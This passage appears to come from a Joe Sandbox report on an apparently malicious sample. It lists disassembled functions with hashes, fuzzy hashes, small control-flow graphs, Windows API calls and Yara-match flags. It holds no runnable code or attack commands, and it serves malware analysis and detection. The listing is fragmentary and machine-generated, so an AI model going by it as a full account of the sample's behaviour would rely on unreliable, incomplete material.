                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: cbab8fac67087a464f4193a80ec6b312f7fc518b9a762dba3cddf41ab211ed33
                                                                                                                                            • Instruction ID: b589b75201ada251a34e09defe9ddee34780b67e53d1e24a590998e2ec5187d9
                                                                                                                                            • Opcode Fuzzy Hash: cbab8fac67087a464f4193a80ec6b312f7fc518b9a762dba3cddf41ab211ed33
                                                                                                                                            • Instruction Fuzzy Hash: 9F900265715400030205B5980714507404697D5352395C131F1015560CD6218A615222
                                                                                                                                            Function 01792D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: dae2e7000b62a58d81d3fb458515c028e7f2e8964cc51e8104bf0ff92ccb97a6
                                                                                                                                            • Instruction ID: 2ba63436e72da9f41afc95f4ef6cbc38bd2dbe21c94194d2d36795762eb367d5
                                                                                                                                            • Opcode Fuzzy Hash: dae2e7000b62a58d81d3fb458515c028e7f2e8964cc51e8104bf0ff92ccb97a6
                                                                                                                                            • Instruction Fuzzy Hash: 3190026170540003D240719854286068005E7E1302F95D121E0414564CD9158A565323
                                                                                                                                            Function 01792D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: c8a81f18757d086598bb8fc00edd3cd8b32dad62f59cb033b373b97f3e1f0c6d
                                                                                                                                            • Instruction ID: 07032ae26a7f142e872e84e37bf0c1d56295748526bb8215d5325d2c20405fdc
                                                                                                                                            • Opcode Fuzzy Hash: c8a81f18757d086598bb8fc00edd3cd8b32dad62f59cb033b373b97f3e1f0c6d
                                                                                                                                            • Instruction Fuzzy Hash: C790026971740002D2807198541860A400597D1203FD5D525A0015568CC9158A695322
                                                                                                                                            Function 01792DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 082232a59f308d2fbdbc7c31a977ad1c819c93f8fb106af6fc0ec15daf437d0f
                                                                                                                                            • Instruction ID: 5267a7cca001844dfa60f0f453cf531a4666f4c6d9d669913b67516c2285da40
                                                                                                                                            • Opcode Fuzzy Hash: 082232a59f308d2fbdbc7c31a977ad1c819c93f8fb106af6fc0ec15daf437d0f
                                                                                                                                            • Instruction Fuzzy Hash: D990027170540413D21171984514707400997D0242FD5C522A0424568DD6568B52A222
                                                                                                                                            Function 01792DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 1f25c3a6c2e969849d43ecffb709e165346cec0e50afcb50d131b7db0dcaa55b
                                                                                                                                            • Instruction ID: 5003fc47589fe078933a4a174dfd8c86d92fb69081e1e840d01de9c70a4b4178
                                                                                                                                            • Opcode Fuzzy Hash: 1f25c3a6c2e969849d43ecffb709e165346cec0e50afcb50d131b7db0dcaa55b
                                                                                                                                            • Instruction Fuzzy Hash: AD900261746441525645B19844145078006A7E02427D5C122A1414960CC5269A56D722
                                                                                                                                            Function 01792C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 2f256decff31a9a8bce0b041a2e7d2ac74a23e825439a21ae4889e6383aa0e28
                                                                                                                                            • Instruction ID: 1cd384c886c992e70400a000f0aa665087263f87a2c2c32036fad086150b92a6
                                                                                                                                            • Opcode Fuzzy Hash: 2f256decff31a9a8bce0b041a2e7d2ac74a23e825439a21ae4889e6383aa0e28
                                                                                                                                            • Instruction Fuzzy Hash: D390027170548802D2107198841474A400597D0302F99C521A4424668DC6958A917222
                                                                                                                                            Function 01792CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 068745f1fb3db0a461bf578f4fe6d233afc00f3272c79325a1c3b5eb557c8013
                                                                                                                                            • Instruction ID: 9fe8dfb865427f8f968dbb3e68a45d9693adc4e793c8ea4967804cdb47d1b227
                                                                                                                                            • Opcode Fuzzy Hash: 068745f1fb3db0a461bf578f4fe6d233afc00f3272c79325a1c3b5eb557c8013
                                                                                                                                            • Instruction Fuzzy Hash: CD90027170540402D20075D85418646400597E0302F95D121A5024565EC6658A916232
                                                                                                                                            Function 01792F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 3b7ebf6629991fb2157251fc6657d883c1880737fa8f4734151aab861f61bf22
                                                                                                                                            • Instruction ID: 6fde472284f6ee54a21ce4eb8ac6833acf9188cc5bfb7308834464a13a54096c
                                                                                                                                            • Opcode Fuzzy Hash: 3b7ebf6629991fb2157251fc6657d883c1880737fa8f4734151aab861f61bf22
                                                                                                                                            • Instruction Fuzzy Hash: AE9002A174540442D20071984424B064005D7E1302F95C125E1064564DC619CE526227
                                                                                                                                            Function 01792FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 06a9e774ddda6dd133f0d1016f1516332e524ef8ecc85d3edb59c89e64f2c972
                                                                                                                                            • Instruction ID: 8bb9b63ee5d5c3716a2740af00096135313ee6a93ec22701f0e722b9f14fbd74
                                                                                                                                            • Opcode Fuzzy Hash: 06a9e774ddda6dd133f0d1016f1516332e524ef8ecc85d3edb59c89e64f2c972
                                                                                                                                            • Instruction Fuzzy Hash: 8C900261715C0042D30075A84C24B07400597D0303F95C225A0154564CC9158A615622
                                                                                                                                            Function 01792FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: d6ce51c1e4f24c9d2decdb6b01db7b597bd4c50d9a5d297f1158d9cbb28f5bd6
                                                                                                                                            • Instruction ID: fcf9ec9773cd3580b1b771079a7a8c43d7ca8ea5c205309152f824ff8e6c0657
                                                                                                                                            • Opcode Fuzzy Hash: d6ce51c1e4f24c9d2decdb6b01db7b597bd4c50d9a5d297f1158d9cbb28f5bd6
                                                                                                                                            • Instruction Fuzzy Hash: CD900261B0540042424071A888549068005BBE1212795C231A0998560DC5598A655766
                                                                                                                                            Function 01792F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 97732862fe78fad66edce4e4ae524a9c4b3498c405835e33f5adfea715b1f45c
                                                                                                                                            • Instruction ID: 67d1a144154ae728617270a025bf7c8ae92716db71841c9f3917107165eed600
                                                                                                                                            • Opcode Fuzzy Hash: 97732862fe78fad66edce4e4ae524a9c4b3498c405835e33f5adfea715b1f45c
                                                                                                                                            • Instruction Fuzzy Hash: 7A90027170580402D2007198482470B400597D0303F95C121A1164565DC6258A516672
                                                                                                                                            Function 01792EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: e9b5a6148c94d993cb9c8144c840207afe03a3be0d913fa51ff3443aaa960345
                                                                                                                                            • Instruction ID: ba377da9deda8241eb90e85346f8eb7f45e027c078121d2fc2ee693087a3c51b
                                                                                                                                            • Opcode Fuzzy Hash: e9b5a6148c94d993cb9c8144c840207afe03a3be0d913fa51ff3443aaa960345
                                                                                                                                            • Instruction Fuzzy Hash: CE9002B170540402D24071984414746400597D0302F95C121A5064564EC6598FD56766
                                                                                                                                            Function 01792E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 9bc74c64df4a4fff80bdadc1ae82d6e833975b90361e9f5ac0f21c8b6824c197
                                                                                                                                            • Instruction ID: da004defd7e15679e400dad870e2559dcd43d1201d07f7e22b5d7c9481905015
                                                                                                                                            • Opcode Fuzzy Hash: 9bc74c64df4a4fff80bdadc1ae82d6e833975b90361e9f5ac0f21c8b6824c197
                                                                                                                                            • Instruction Fuzzy Hash: 81900261B0540502D20171984414616400A97D0242FD5C132A1024565ECA258B92A232
                                                                                                                                            Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                                            • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                                                                                                                            • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                                            • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                                                                                                                            Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 3 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID: &EA
                                                                                                                                            • API String ID: 1279760036-1330915590
                                                                                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                            • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                                                                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                            • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                                                                                                                            Function 004082D4 Relevance: 1.6, APIs: 1, Instructions: 59threadwindowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 202 4082d4-4082d8 203 408331-408343 call 40ace0 202->203 204 4082da-4082db 202->204 206 408347-40835a call 414e40 203->206 204->206 207 4082dd-4082fd call 41b860 call 41b710 204->207 213 40835c-40836e PostThreadMessageW 206->213 214 40838e-408392 206->214 216 408370-40838a call 40a470 213->216 217 40838d 213->217 216->217 217->214
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 0c5670ac6251c0a60da8687f5d77d26f275b51540f007e75c674e4efe23d972f
                                                                                                                                            • Instruction ID: 19c01656c3898c69e84ee8908718035e3049677ab4d7dde92baba569fadc05e3
                                                                                                                                            • Opcode Fuzzy Hash: 0c5670ac6251c0a60da8687f5d77d26f275b51540f007e75c674e4efe23d972f
                                                                                                                                            • Instruction Fuzzy Hash: 50012D3164031C77E711B5615C02FEE7358AB84B54F09017EFE44FB2C1DAB96D0642E9
                                                                                                                                            Function 0040830C Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 221 40830c-40833d call 41be20 call 41c9c0 226 408343-40835a call 414e40 221->226 227 40833e call 40ace0 221->227 231 40835c-40836e PostThreadMessageW 226->231 232 40838e-408392 226->232 227->226 233 408370-40838a call 40a470 231->233 234 40838d 231->234 233->234 234->232
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 19c66865f75542f675f54a46dd6cd54def56d3851c5970707138c9339e0e24a1
                                                                                                                                            • Instruction ID: 8733b47f60013285a8807cb7a5d81815fd96b1e7676cb7f4731c5b02c55d18d7
                                                                                                                                            • Opcode Fuzzy Hash: 19c66865f75542f675f54a46dd6cd54def56d3851c5970707138c9339e0e24a1
                                                                                                                                            • Instruction Fuzzy Hash: 7601D871A803187AE720A6918C03FFE6B1C9B41B55F05016EFF04FA1C1D6A9290647E9
                                                                                                                                            Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 237 408310-40831f 238 408328-40833d call 41c9c0 237->238 239 408323 call 41be20 237->239 242 408343-40835a call 414e40 238->242 243 40833e call 40ace0 238->243 239->238 247 40835c-40836e PostThreadMessageW 242->247 248 40838e-408392 242->248 243->242 249 408370-40838a call 40a470 247->249 250 40838d 247->250 249->250 250->248
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                                            • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                                                                                                                            • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                                            • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                                                                                                                                            Function 00408393 Relevance: 1.5, APIs: 1, Instructions: 48threadwindowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 253 408393-408394 255 408333-40833d 253->255 256 40832e call 41c9c0 253->256 257 408343-40835a call 414e40 255->257 258 40833e call 40ace0 255->258 256->255 262 40835c-40836e PostThreadMessageW 257->262 263 40838e-408392 257->263 258->257 264 408370-40838a call 40a470 262->264 265 40838d 262->265 264->265 265->263
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 8c991781031f8c6d473ebbd6a23dc71827103370b9fd2e7a6c452dfc9f5126f3
                                                                                                                                            • Instruction ID: 3e3665392b07dc50b903ca1482a20c39a0d8d9c50d14a314250b7dbfb1e47f4d
                                                                                                                                            • Opcode Fuzzy Hash: 8c991781031f8c6d473ebbd6a23dc71827103370b9fd2e7a6c452dfc9f5126f3
                                                                                                                                            • Instruction Fuzzy Hash: 2DF02271A8032877E7206A544C02FFF27185B81F14F09016EFE84FA1C1DABE690202EA
                                                                                                                                            Function 0041A781 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 292 41a781-41a7aa call 41af20 294 41a7af-41a7c4 LookupPrivilegeValueW 292->294
                                                                                                                                            APIs
                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                            • Opcode ID: 6f60b12bae23740ddff04b9b2a435f9d619a484c6c9bb8091acf3cd8a9da8c8a
                                                                                                                                            • Instruction ID: f7a5976cd5a0d784b45962738d5861c56f65e69eb5b5f090e7fa20213427d3ba
                                                                                                                                            • Opcode Fuzzy Hash: 6f60b12bae23740ddff04b9b2a435f9d619a484c6c9bb8091acf3cd8a9da8c8a
                                                                                                                                            • Instruction Fuzzy Hash: 10F0EDB2200204ABDB24DF55DC85EE733A9EF89318F1080AEF90D6B241CA35E805CBB0
                                                                                                                                            Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 295 41a630-41a661 call 41af20 RtlFreeHeap
                                                                                                                                            APIs
                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                            • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                                                                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                            • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                                                                                                                                            Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 298 41a790-41a7a9 299 41a7af-41a7c4 LookupPrivilegeValueW 298->299 300 41a7aa call 41af20 298->300 300->299
                                                                                                                                            APIs
                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                            • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                                                                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                            • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                                            Function 0041A666 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                            • Opcode ID: 9379220829e3c419878ff4888d194fe66dd23624891254af377271388a777a72
                                                                                                                                            • Instruction ID: fd19ce839db182b36b6e96dd962a584e924bd8999524a3a1af9ee6c2b89418f0
                                                                                                                                            • Opcode Fuzzy Hash: 9379220829e3c419878ff4888d194fe66dd23624891254af377271388a777a72
                                                                                                                                            • Instruction Fuzzy Hash: ECE08C716012047BC320DFA8CC85FC73BA99F48754F11846AF96D6B241C530EA008BE1
                                                                                                                                            Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                            Download Yara Rule
